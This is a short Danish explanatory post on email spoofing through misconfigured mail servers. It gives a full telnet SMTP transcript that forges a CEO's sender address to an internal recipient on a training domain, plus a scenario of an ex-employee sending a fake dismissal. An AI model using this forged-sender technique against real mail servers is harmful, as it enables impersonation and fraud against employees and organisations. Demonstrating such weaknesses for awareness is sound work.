Mail servere kan misbruges af externe brugere. Det er muligt at sende e-mails fra en afsender til en modtager på samme domæne, og dermed lave en falsk e-mail med en gyldig afsender.
Hvis en tidliger ansat ønsker er blever sur på sin gamle arbejdsplads kan Direktør A kan altså fyre sælger B pr. e-mail uden at Direktør A selv har gjort noget.
Dette er et eksempel:
Jeg laver en telnet forbindelse til firmaet nwtraders.msft:
telnet nwtraders.mfst 25
220 server1.nwtraders.msft Microsoft ESMTP MAIL Service, Version: 6.0.3
790.0 ready at Thu, 27 May 2004 09:59:58 +0200
HELO local.name
250 server1.nwtraders.msft Hello [MY-IP-ADRESS]
MAIL FROM: ceo@nwtraders.msft
250 2.1.0 ceo@nwtraders.msft....Sender OK
RCPT TO: abc@nwtraders.msft
250 2.1.5 abc@nwtraders.msft
DATA
354 Start mail input; end with <CRLF>.<CRLF>
SUBJECT: Security test
This is a test
.
250 2.6.0 <server1.nwtraders.msft > Queued mail for delivery
|